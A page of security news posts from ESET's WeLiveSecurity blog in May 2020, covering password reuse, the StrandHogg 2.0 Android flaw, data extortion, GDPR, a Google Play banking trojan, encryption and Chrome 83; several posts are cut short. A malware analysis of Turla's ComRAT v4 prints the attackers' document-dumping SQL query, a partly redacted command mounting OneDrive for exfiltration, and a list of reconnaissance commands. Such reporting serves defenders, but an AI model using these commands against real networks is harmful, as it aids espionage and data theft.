Week in security with Tony Anscombe

New ESET research into Turla’s malicious toolkit – GDPR turns two – Critical flaw in Android devices

This week, ESET researchers published their analysis of a new version of ComRAT – one of the oldest malware families used by the Turla group to breach a number of high-profile targets, including the US military way back in 2008. As the European Union’s GDPR turns two, are companies taking privacy and consent more seriously and do individuals engage in the protection of their personal information more? Nearly all versions of Android have been found to be affected by a critical vulnerability dubbed StrandHogg 2.0. All this – and more – on WeLiveSecurity.com.

People know reusing passwords is risky – then do it anyway

And most people don’t change their password even after hearing about a breach, a survey finds

While nearly all respondents in a recent survey were aware of the risks associated with poor password hygiene, most people don’t do anywhere near enough to keep attackers at bay, the third installment of the LastPass Psychology of Passwords Report has revealed.

As many as 9 in 10 respondents surveyed by the password manager purveyor acknowledged knowing that recycling the same password or using a variation of it across multiple account was risky. Still, two-thirds used the same password or a derivate for all their online accounts, which is actually an increase of 8 percentage points from the survey conducted in 2018. The new edition of the survey took place in March of this year and canvassed opinions from 3,250 people on various continents.

The report also reveals that 53% of respondents haven’t changed their password in the last year even after they heard about a breach in the news. Also, 4 in 10 people believe that having an easy-to-remember password is more important than a secure password. Apparently some take it a bit too far, since studies have shown that year after year, passwords such as “12345”, “123456” and “123456789” top the lists of the most popular passwords.

One of the reasons people don’t apply proper password hygiene is that they underestimate the risk. In fact, 4 in 10 think that their accounts aren’t worth the hacking effort. One thing to remember is that everyone is a target. Your information can be part of a breach that involves millions of stolen credentials. That data can then be used to piece together other information, since if you recycle your passwords, bad actors can gain access to other services, including your online banking.

RELATED READING: How to spot if your password was stolen in a security breach

Speaking of which, almost three-quarters of respondents concurred that financial accounts need extra protection. About half said that email accounts needed stronger passwords since those are usually at the center of people’s digital identities and can contain tons of exploitable data. A third considers medical records sensitive enough to require protection by stronger passwords as well.

Luckily, most respondents realize that there are additional steps they can take to secure their accounts, such as multi-factor authentication (MFA). Only 1 in 5 wasn’t aware of what MFA was, while over a half said that they use it to secure their personal accounts and 37% use it at work.

To sum it up, you should avoid creating simple passwords and recycling them across accounts – two of the common password mistakes people make. Instead, opt for long passphrases, consider using a password manager and add that extra protection layer with MFA, whenever available.

28 May 2020 – 05:01PM

Critical Android flaw lets attackers hijack almost any app, steal data

Left unpatched, the vulnerability could expose almost all Android users to the risk of having their personal data intercepted by attackers

Researchers have found a critical flaw that affects nearly all devices running Android 9.0 or older, which implies that over 90% of Android users could be vulnerable. If exploited, the security hole allows hackers to hijack almost any app and steal victims’ sensitive data, according to researchers at Promon, who uncovered the vulnerability and dubbed it StrandHogg 2.0.

The good news is that malware exploiting the vulnerability has not been observed in the wild. Importantly, Google provided a patch to Android device makers in April 2020, with the fix – for Android versions 8.0, 8.1 and 9.0 – being rolled out to the public as part of the latest assortment of monthly security updates throughout this month. Promon notified Google about the vulnerability in early December 2019.

Indexed as CVE-2020-0096, the elevation of privilege flaw resides in the Android system component and can be abused through a method called reflection that allows malicious apps to impersonate legitimate applications while the victim is none the wiser. As a result, once a malicious app is downloaded and installed on a vulnerable device, an attacker could steal the victim’s access credentials, record conversations, track their movements via GPS, or access stored data such as photos or messages.

Let’s say a malicious app sneaks into your device and you click on a legit app that requires your access credentials. Instead of that app, however, the data-stealing overlay is displayed. You go on to enter your credentials and those are immediately transferred to the criminal, who now has control of this app. It isn’t just the credentials that are at risk – the app can hijack permissions that are being granted to apps, notably access to the GPS, microphone, or camera. Most apps are vulnerable to the attack by default.



The research team pointed out that compared to StrandHogg, its “less evil twin”, the newly-disclosed flaw is much more difficult to detect because of its code-based execution. Also, it can also “dynamically attack nearly any app on a given device simultaneously at the touch of a button”, whereas StrandHogg could only attack apps one at a time.

Promon theorizes that cybercriminals would probably exploit both vulnerabilities in unison since they can attack devices in different ways, while at the same time many measures used to mitigate one vulnerability cannot be applied to the other.

To protect yourself against StrandHogg 2.0, you should update your Android device to the latest available OS version. Generally speaking, it’s also important to have a reputable mobile security solution in place and to be very cautious about installing apps from outside Google Play.

27 May 2020 – 05:16PM

Crooks threaten to leak customer data stolen from e‑commerce sites

A hack-and-extort campaign takes aim at poorly secured databases replete with customer information that can be exploited for further attacks

A number of e-commerce websites from multiple continents have had their customer databases stolen, with an unknown seller offering at least 1.62 million rows of personal records for sale on a public website. The online stores – based in Germany, the United States, Brazil, Italy, India, Spain, and Belarus – have also received ransom notes as the cybercriminals threaten to release the data if the retailers don’t pay up within 10 days.

According to BleepingComputer – which broke the story and listed some of the hacked merchants – the loot may actually be far larger than what has been put up for sale. The siphoned information varies depending on the ransacked retailer and includes email addresses, hashed passwords, postal addresses, gender and dates of birth.

Cybercriminals can use this Personally Identifiable Information (PII) for all manner of nefarious activities, including identity theft or targeted phishing attacks. The least you as a customer can do is to change your password on the site(s) and keep an eye out for suspicious emails.

It remains unclear who the thieves are, but apparently they targeted unsecured or ill-secured servers that can be found on the public web. They copied the stores’ SQL databases and now demand a ransom of 0.06 bitcoin (some US$537 at today’s rate) within 10 days on pain of publishing or using the data as they see fit.

The attackers also offer unspecified proof, which one might assume is a sample of the data. Some of the shops may have taken them up on their word, since the hackers’ BTC wallets have recently recorded transactions amounting to 5.8 bitcoin (approximately US$52,000).

Speaking of which, paying the ransom to a cybercriminal may prove to be a leap of faith, since you have no way of knowing if they won’t sell your data onwards even if they return it. Ransomware victims may face a similar conundrum, as discussed in this article.

BleepingComputer estimates that around 31 stolen databases have been put up for sale. Based on the number of abuse reports filed against the hackers’ bitcoin addresses, the site believes it to be just a fraction of the overall number. The most recent database is from March and each listing contains a sample of the data, so that potential buyers can check the wares.

Given the wealth of personal data that they may store on their customers, e-commerce sites pose a juicy target for bad actors. Hack-and-extort campaigns, meanwhile, are by no means a novel approach and high-profile incidents have affected, for example, well-known names in the entertainment industry, including HBO in 2017. Just days ago, an entertainment law firm also fell victim to a similar attack.

26 May 2020 – 08:44PM

From Agent.BTZ to ComRAT v4: A ten‑year journey

Turla has updated its ComRAT backdoor and now uses the Gmail web interface for Command and Control

ESET researchers have found a new version of one of the oldest malware families run by the Turla group, ComRAT. Turla, also known as Snake, is an infamous espionage group that has been active for more than ten years. We have previously described many campaigns attributed to this group.

ComRAT, also known as Agent.BTZ and to its developers as Chinch, is a Remote Access Trojan (RAT) that became infamous after its use in a breach of the US military in 2008. The first version of this malware, likely released in 2007, exhibited worm capabilities by spreading through removable drives. From 2007 to 2012, two new major versions of the RAT were released. Interestingly, both employed the well-known Turla XOR key:

1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s

Until mid-2017, the Turla developers made a few changes to ComRAT, but these variants were apparently still derived from the same code base.

Then, in 2017, we noticed that a very different version of ComRAT had been released. This new version used a completely new code base and was far more complex than its predecessors. Here are the main characteristics of this malware family:

ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020. We identified at least three targets: two Ministries of Foreign Affairs and a national parliament. ComRAT was used to exfiltrate sensitive documents. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data. ComRAT is a complex backdoor developed in C++. ComRAT uses a Virtual FAT16 File System formatted in FAT16. ComRAT is deployed using existing access methods, such as the PowerStallion PowerShell backdoor. ComRAT has two Command and Control channels HTTP: It uses exactly the same protocol as ComRAT v3 Email: It uses the Gmail web interface to receive commands and exfiltrate data ComRAT can perform many actions on the compromised computers, such as executing additional programs or exfiltrating files. Attribution to Turla

Based on the victimology and the TTPs, we believe that ComRAT is used exclusively by Turla. There are a few elements linking ComRAT v4 to Turla:

It uses the same internal name, Chinch, as the previous versions It uses the same custom C&C protocol over HTTP as ComRAT v3 A part of the network infrastructure is shared with another Turla malware family, Mosquito It was dropped by, or has dropped other, Turla malware families: A customized PowerShell loader The PowerStallion backdoor The RPC backdoor Insight into attacker’s activity

During our investigation, we were able to gain insights about what Turla operators were doing on the compromised machines.

The main use of ComRAT is stealing confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents. Figure 1 is the redacted SQL command.

sqlCommand.CommandText = “select top ” + num2.ToString() + ” filename, img, datalength(img), id from <Redacted> with(nolock) where not img is null and id>” + num4.ToString();

sqlCommand.CommandText += ” and datalength(img)<1500000 and (filename like ‘%.doc’ or filename like ‘%.docx’ or filename like ‘[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]%.pdf’ or (filename like ‘3%.pdf’ and len(filename)>9))”;

sqlCommand.CommandText += ” order by id”;

Figure 1. SQL command to dump documents from the central database (partially redacted)

These documents were then compressed and exfiltrated to a cloud storage provider such as OneDrive or 4shared. Cloud storage is mounted using the net use command as shown in Figure 2.

tracert -h 10 yahoo.com

net use  https://docs.live.net/E65<redacted> <redacted password> /u:<redacted>@aol.co.uk

tracert -h 10 yahoo.com

Figure 2. Command to mount a OneDrive folder using net use (partially redacted)

In addition to document stealing, the operators also run many commands to gather information about the Active Directory groups or users, the network, or Microsoft Windows configurations such as the group policies. Figure 3 is a list of commands executed by Turla operators.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

gpresult /z

gpresult /v

gpresult

net view

net view /domain

netstat

netstat -nab

netstat -nao

nslookup 127.0.0.1

ipconfig /all

arp -a

net share

net use

systeminfo

net user

net user administrator

net user /domain

net group

net group /domain

net localgroup

net localgroup

net localgroup Administrators

net group “Domain Computers” /domain

net group “Domain Admins” /domain

net group “Domain Controllers” /domain

dir “%programfiles%”

net group “Exchange Servers” /domain

net accounts

net accounts /domain

net view 127.0.0.1 /all

net session

route print

ipconfig /displaydns

Figure 3. Basic recon of the compromised machine

Finally, we also noticed that Turla operators are aware of and try to evade security software. For instance, they regularly exfiltrate security-related log files in order to understand whether their malware samples have been detected. This shows the level of sophistication of this group and its intention to stay on the same machines for a long time.

Technical analysis

According to its compilation timestamp, which is likely genuine, the first known sample of ComRAT v4 was compiled in April 2017. The most recent iteration of the backdoor we’ve seen was, to the best of our knowledge, compiled in November 2019.

Based on ESET telemetry, we believe that ComRAT is installed using an existing foothold such as compromised credentials or via another Turla backdoor. For instance, we’ve seen ComRAT installed by PowerStallion, their PowerShell-based backdoor we described in 2019.

The ComRAT installer is a PowerShell script that creates a Windows scheduled task and fills a Registry value with the encrypted payload.

ComRAT v4 has several components:

an orchestrator, injected into explorer.exe. It controls most of ComRAT functions including the execution of backdoor commands. a communication module

Two years later, has GDPR fulfilled its promise?

Has the landmark law helped build a culture of privacy in organizations and have consumers become more wary of sharing their personal data?

“Relying on the government to protect your privacy is like asking a peeping Tom to install your window blinds” – John Perry Barlow, EFF (July 1992).

Any individual who has the slightest engagement in the privacy of their personal data online will likely be sympathetic to Barlow’s quote. It’s been 2 years since the implementation of the General Data Protection Regulation (GDPR), the EU’s data protection and privacy regulation which aimed to give control to individuals over their personal data and to simplify the requirements on businesses.

Are there fewer data breaches? Are companies taking privacy and consent more seriously? Do individuals engage in the protection of their personal information more? It’s difficult to answer the question of whether GDPR has been successful as we don’t know what would have been the state of play if the data protection regulation it succeeded was still in place.

Without doubt, though, the global privacy landscape changed with GDPR. The legislation placed the privacy conversation front and center in capitals and board rooms around the world. There are now in excess of 100 countries and states with individual privacy regulations, some more strict than others, and some of them, such as Argentina, Brazil, Chile, Japan, Kenya, South Korea and California, have clearly taken GDPR as a base model for their own legislation.

The growing number of regulations around the world demonstrates both the need and the willingness of governing bodies to step in, but with the growing number a complexity is created, something I discussed in a recent blogpost. The complexities of so many regulations probably mean that companies will look to harmonize their approach to privacy to comply with the majority and have a defensible position should they inadvertently breach a regulation.

Corporations, I am sure, have taken heed as regulators tasked with enforcing the GDPR started flexing their muscles and issuing fines or giving notice of intended fines. The first major fine, of €50 million (US$54 million), was issued in January 2019 to Google by the French data protection authority CNIL for showing insufficient control, consent and transparency over the use of personal data for behavioral advertising.

This was eclipsed by a mammoth £183 million (US$221 million) fine issued by the British Information Commissioner’s Office (ICO) against British Airways in July 2019 for poor security that resulted in a malicious attack that affected 380,000 website transactions. In comparison, Facebook was fined a mere £500,000 (US$605,000) by the ICO regarding the Cambridge Analytica scandal, which happened shortly before the implementation of GDPR and was the maximum fine at the time.

What’s the law got to do with it?

As a consumer, if you are in a country where privacy legislation has taken a similar approach to the GDPR, you will be used to seeing the numerous consent dialogues that companies are now required to display when collecting your personal data. The bold position of requiring opt-in consent set the bar for future legislation by other authorities; even if opt-out became the chosen route, the prominence of the message, which can probably, in part, be attributed to GDPR, at least gives the consumer the opportunity to make an informed decision.

There has also been a sea change in product and service development, and this too can probably, in part, be attributed to the GDPR. At the inception of a new product of service, privacy by design and default is now a relatively standard approach for any team to consider as projects come to fruition. Consumers now expect there to be a trusted relationship with a vendor and the vendor understands that this will bring long-term commercial success.

It seems impossible to write this blogpost without mentioning the current COVID-19 predicament with the numerous contact-tracing apps and location mapping data being provided to governments by telecom carriers. While privacy may have been put on hold in some cases, or at least modified to a point that in normal circumstances would be unacceptable, the visibility on personal information privacy that both the GDPR and the Cambridge Analytica scandal created have caused global scrutiny on the use of data to help solve the current pandemic. This scrutiny has seen governments backtrack on proposals and technology companies innovate new methods to ensure anonymity; there’s also a general consensus that a contact-tracing app needs to respect the user’s right to privacy.

The GDPR has legitimized privacy advocates across the globe having a voice and for their concerns to be considered and listened too. The big question, though, remains: ‘Have citizens become the owners of their personal data?’ I leave you with an inspired quote from the late Steve Jobs…

“Privacy means people know what they’re signing up for, in plain language, and repeatedly. I believe people are smart. Some people want to share more than other people do. Ask them.” – Steve Jobs

25 May 2020 – 11:30AM

Week in security with Tony Anscombe

ESET research into Winnti Group’s new backdoor – A dangerous Android app under the microscope – The BIAS Bluetooth bug

ESET researchers have published a deep-dive into a new backdoor, PipeMon, that the Winnti Group has deployed against several video gaming companies in Asia. Also this week, ESET researchers released their analysis of “DEFENSOR ID”, a particularly insidious banking trojan that had snuck into Google Play. Academics disclose a security flaw in the Bluetooth protocol that left a wide range devices vulnerable to the so-called BIAS attacks. All this – and more – on WeLiveSecurity.com..

Insidious Android malware gives up all malicious features but one to gain stealth

ESET researchers detect a new way of misusing Accessibility Service, the Achilles’ heel of Android security

ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions, notably wiping out the victim’s bank account or cryptocurrency wallet and taking over their email or social media accounts. Called “DEFENSOR ID”, the banking trojan was available on Google Play at the time of the analysis. The app is fitted with standard information-stealing capabilities; however, this banker is exceptionally insidious in that after installation it requires a single action from the victim – enable Android’s Accessibility Service – to fully unleash the app’s malicious functionality.

The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth. Its creators reduced the app’s malicious surface to the bare minimum by removing all potentially malicious functionalities but one: abusing Accessibility Service.

Accessibility Service is long known to be the Achilles’ heel of the Android operating system. Security solutions can detect it in countless combinations with other suspicious permissions and functions, or malicious functionalities – but when faced with no additional functionality nor permission, all failed to trigger any alarm on DEFENSOR ID.

By “all” we mean all security mechanisms guarding the official Android app store (including the detection engines of the members of the App Defense Alliance) and all security vendors participating in the VirusTotal program (see Figure 1).

Figure 1. According to the VirusTotal service, no security vendor detected the DEFENSOR ID app until it was pulled off the Play store

DEFENSOR ID was released on Feb 3, 2020 and last updated to v1.4 on May 6, 2020. The latest version is analyzed here; we weren’t able to determine if the earlier versions were also malicious. According to its profile at Google Play (see Figure 2) the app reached a mere 10+ downloads. We reported it to Google on May 16, 2020 and since May 19, 2020 the app has no longer been available on Google Play.

The developer name used, GAS Brazil, suggests the criminals behind the app targeted Brazilian users. Apart from including the country’s name, the app’s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia. That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking. However, there is also an English version of the DEFENSOR ID app (see Figure 3) besides the Portuguese one, and that app has neither geographical nor language restrictions.

Playing further off the suggested GAS Tecnologia link, the app promises better security for its users. The description in Portuguese promises more protection for the user’s applications, including end-to-end encryption. Deceptively, the app was listed in the Education section.

Figure 2. The DEFENSOR ID app on Google Play – Portuguese version (translates roughly as: “Your new Defensor app available for: / Individuals / Legal entities / From now on you will have more protection when using your applications, encryption for end-to-end users”)

Figure 3. The DEFENSOR ID app on Google Play – English version

Functionality

After starting, DEFENSOR ID requests the following permissions:

allow modify system settings permit drawing over other apps, and activate accessibility services.

If an unsuspecting user grants these permissions (see Figure 4), the trojan can read any text displayed in any app the user may launch – and send it to the attackers. This means the attackers can steal the victim’s credentials for logging into apps, SMS and email messages, displayed cryptocurrency private keys, and even software-generated 2FA codes.

The fact the trojan can steal both the victim’s credentials and can control also their SMS messages and generated 2FA codes means DEFENSOR ID’s operators can bypass two-factor authentication. This opens the door to, for example, fully controlling the victim’s bank account.

To make sure the trojan survives a device restart, it abuses already activated accessibility services that will launch the trojan right after start.

 

Figure 4. The permission requests by DEFENSOR ID

Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server such as uninstalling an app, launching an app and then performing any click/tap action controlled remotely by the attacker (see Figure 5).

Figure 5. The list of commands DEFENSOR ID may get from its C&C server

In 2018, we saw similar behavior, but all the click actions were hardcoded and suited only for the app of the attacker’s choice. In this case, the attacker can get the list of all installed apps and then remotely launch the victim’s app of their choice to either steal credentials or perform malicious actions (e.g. send funds via a wire transfer).

We believe that this is the reason the DEFENSOR ID trojan requests the user to allow “Modify system settings”. Subsequently, the malware will change the screen off time-out to 10 minutes. This means that, unless victims lock their devices via the hardware button, the timer provides plenty of time for the malware to remotely perform malicious, in-app operations.

If the device gets locked, the malware can’t unlock it.

Malware data leak

When we analyzed the sample, we realized that the malware operators left the remote database with some of the victims’ data freely accessible, without any authentication. The database contained the last activity performed on around 60 compromised devices. We found no other information stolen from the victims to be accessible.

Thanks to this data leak, we were able to confirm that the malware really worked as designed: the attacker had access to the victims’ entered credentials, displayed or written emails and messages, etc.

Once we reached the non-secured database, we were able to directly observe the app’s malicious behavior. To illustrate the level of threat the DEFENSOR ID app posed, we performed three tests.

First, we launched a banking app and entered the credentials there. The credentials were immediately available in the leaky database –

How encryption can help protect your sensitive data

Here’s how encryption can help keep your data safe from prying eyes – even if your device is stolen or your cloud account is hacked

You probably store all kinds of sensitive information on your personal computer – or your smartphone, for that matter. For good measure, you may even store your data in the cloud. And like the responsible netizen that you are, you’ve probably secured access to your devices with a passphrase, a biometric lock or even a combination of both. That’s all well and good, but what if you lose your device or it is stolen? That’s where encryption comes in, adding an extra safeguard.

To be sure, encryption isn’t just limited to storing your data; you can also encrypt your communications and your web traffic, as well as your passwords. All of these can be considered best practices to secure your private data, and we’ll walk you through some of the choices you have.

Disk encryption

Most computers still have removable hard disks that aren’t soldered onto the motherboard; alternatively, as extra storage, people use external disks. That’s why having full-disk encryption is a great extra security layer; if you misplace your disk or it is stolen, then no one can access any of the information on it. The disk is fully encrypted, including all your data, your software and the operating system you’re running. Unless you can enter the key at boot-up, your whole computer essentially becomes quite an expensive paperweight. There are several commercial options with advanced features, open source projects and built-in options in most major operating systems.

When it comes to smartphones and tablets, the equivalent functionality to look for is device encryption, which is built into, and commonly enabled by default, on contemporary devices. There are many easily found online guides that explain checking for and, if necessary, enabling device encryption for Android or iOS devices.

Cloud encryption

Most of us use cloud storage for its ease of access – you can do it from anywhere at any time so long as you have an internet connection. Unfortunately, that accessibility introduces its own set of challenges. Over the years, cloud storage services have experienced security breaches, either due to human error or targeted attack by ne’er-do-wells. Therefore, encrypting your files before uploading them to the cloud should be a no-brainer.

Even if there is a breach or the cloud provider’s system is compromised, the data bad actors may obtain will be useless to them without the decryption key. You can choose from a variety of products based on your needs and the offered encryption features. Look at those that offer AES encryption at the very least. There are a number of free and commercial options, all with various limitations and a range of price options among the paid-for products and services.

Encrypt your web traffic

One of the easiest ways you start with is by setting up a Virtual Private Network (VPN), which works as an encrypted tunnel for internet traffic. Let’s say you’re working from a coffee shop and you are going to share some sensitive data with a client, a VPN will allow you to share that data over an encrypted network without anyone intercepting it. Another example is that you can securely access data stored on your home network even if you are physically on the other side of the globe. There are multiple types of VPNs to choose from and, if you’re not sure which one will suit your needs the best, you can check out our article on types of VPNs.

RELATED READING: Encryption 101: What is it? When should I use it?

Another way to protect your privacy involves using an anonymity network, such as Tor. The Tor network directs your traffic through a volunteer overlay network of relays and wraps it in multiple layers of encryption. The idea is, of course, to protect your identity and your browsing habits from anyone snooping around.

Another thing you should also always watch out for is that the website you’re accessing uses the HTTPS protocol. The S stands for secure and means that all the communication taking place between the visitor (you) and the webserver is encrypted. Most of the world’s top websites now use HTTPS by default.

Encrypt your messages

When it comes to messaging apps, you have a variety to choose from and while the most popular do offer end-to-end encryption, not all of them have it turned on by default. For example, to turn on end-to-end encryption in Facebook Messenger you have to start a secret conversation by clicking on the profile picture of the user and choosing “Go to secret conversation”; only after that do your messages with that specific recipient become encrypted. WhatsApp, for one, has the option turned on by default; so does Telegram, but it also provides an extra layer of security with its Secret Chat feature, which allows you to set self-destruct on the messages and files you send.

Signal remains one of the most highly rated options by cryptographers, due to its open-source code allowing extensive examination and easy auditing by area specialists. You can also encrypt your email communications as well, with the sender needing your public key to encrypt a message, so that only you can decrypt and read it using your private key, and you needing their public key so they can decrypt encrypted messages you send to them. Again, there are several options, with the most common being PGP or GPG, and S/MIME. There are several plug-ins for, or built-in options in, popular email apps. For example, Microsoft provides a handy guide on how to enable S/MIME in its Outlook email client.

Also worth considering is using a secure email platform, such as ProtonMail and others, that provides end-to-end email encryption. Some are “closed shop” in that you can only send encrypted emails to others using the service and “ordinary” emails to those with other providers, while some provide mechanisms to exchange encrypted messages regardless of the mail

Chrome 83 arrives with enhanced security and privacy controls

New features include DNS over HTTPS, a Safety Check section and simpler cookie management

Google has launched the hotly anticipated version 83 of its Chrome browser that comes complete with a raft of features originally planned for version 82, which was scrapped due to the COVID-19 pandemic. Most of all, the new release brings new or redesigned security and privacy controls, as well as better password protection. The updates will be coming to Chrome on desktop platforms over the next few weeks, said Google.

Topping the list of the new additions is a pair of major upgrades: Enhanced Safe Browsing and Secure DNS. The former is meant to protect you from various online threats, including phishing and malware, in a more proactive manner. “If you turn on Enhanced Safe Browsing, Chrome proactively checks whether pages and downloads are dangerous by sending information about them to Google Safe Browsing,” says AbdelKarim Mardini, Senior Product Manager at Google. More protection updates are in the pipeline over the upcoming year, including tailored warnings for phishing sites.

The Secure DNS feature, meanwhile, includes DNS over HTTPS (DoH) that encrypts your Domain Name System (DNS) lookups with the aim of protecting you against a host of threats to your privacy and security. Chrome will either upgrade you to DNS over HTTPS automatically if the option is supported by your internet service provider, or you can configure it by using a different secure DNS provider. You can even disable the option completely. This update comes after Firefox turned on DoH by default for US users earlier this year while giving the rest of the world the option to flip it on manually in the browser’s settings.

Another new addition to Chrome’s toolset is Safety check. Among other things, the feature will alert you if any of your passwords stored in Chrome has been compromised; if so, it will advise you what to do. It also checks if your browser version is up-to-date or whether Google’s Safe browsing, which warns you if you’re about to or download a malicious extension, is turned on. In case you installed a malicious extension, the feature will tell you how to get rid of it.

The browser’s controls have also gone through a design overhaul, making them easier to understand. It’s now simpler for users to manage cookies and choose how they are used, with an option to block third-party cookies in both regular and Incognito mode. You can even choose to block all cookies on all websites or choose individually. Google has already announced plans to phase out support for third-party cookies in Chrome, and this seems to be one of the steps in that direction.

The control layout in Site settings has been divided into two sections, to make finding sensitive website permissions (location access, camera, microphone, etc.) less tasking. The “Clear browsing data” button has been moved to the top of the Privacy & Security section, since users tend to use it frequently.

21 May 2020 – 04:39PM